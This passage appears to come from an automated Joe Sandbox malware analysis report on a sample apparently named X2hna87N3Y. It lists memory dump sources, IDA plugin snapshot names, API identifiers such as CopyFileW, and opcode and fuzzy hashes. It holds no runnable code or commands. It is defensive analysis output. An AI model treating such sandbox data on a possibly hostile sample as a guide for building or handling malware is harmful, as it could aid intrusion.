                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ___except_validate_context_record
                                                                                                                  • String ID: csm$csm
                                                                                                                  • API String ID: 3493665558-3733052814
                                                                                                                  • Opcode ID: 446aeefaa0ef215a3e5712bacec80f59d68d3fcfd97602c0f1c7c327e59c9103
                                                                                                                  • Instruction ID: e6d5fdfc286cd8ef581cfc420e46366b103a9c4accd5b8f2eff10e453ec4eb2c
                                                                                                                  • Opcode Fuzzy Hash: 446aeefaa0ef215a3e5712bacec80f59d68d3fcfd97602c0f1c7c327e59c9103
                                                                                                                  • Instruction Fuzzy Hash: 3531C432400219FBCF269F54CD44A6A7B66FF09315B1C826AF9944A121D332DCA1DFB1
                                                                                                                  APIs
                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0042646E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CopyFile
                                                                                                                  • String ID: *$*
                                                                                                                  • API String ID: 1304948518-3771216468
                                                                                                                  • Opcode ID: b3c70e620b2a5bffc9ee9673ef11ef18317e07b739a38a59847c99a1fa5a8965
                                                                                                                  • Instruction ID: 3e6526b6d9ae425b3e8d6a86e634f6df26a0ebb4ad7d9e737430cc0399b070e8
                                                                                                                  • Opcode Fuzzy Hash: b3c70e620b2a5bffc9ee9673ef11ef18317e07b739a38a59847c99a1fa5a8965
                                                                                                                  • Instruction Fuzzy Hash: B82166B9910711EFC310AF36DC09712BBB1BF4A701F119A68E0419BA44E738E661CBC9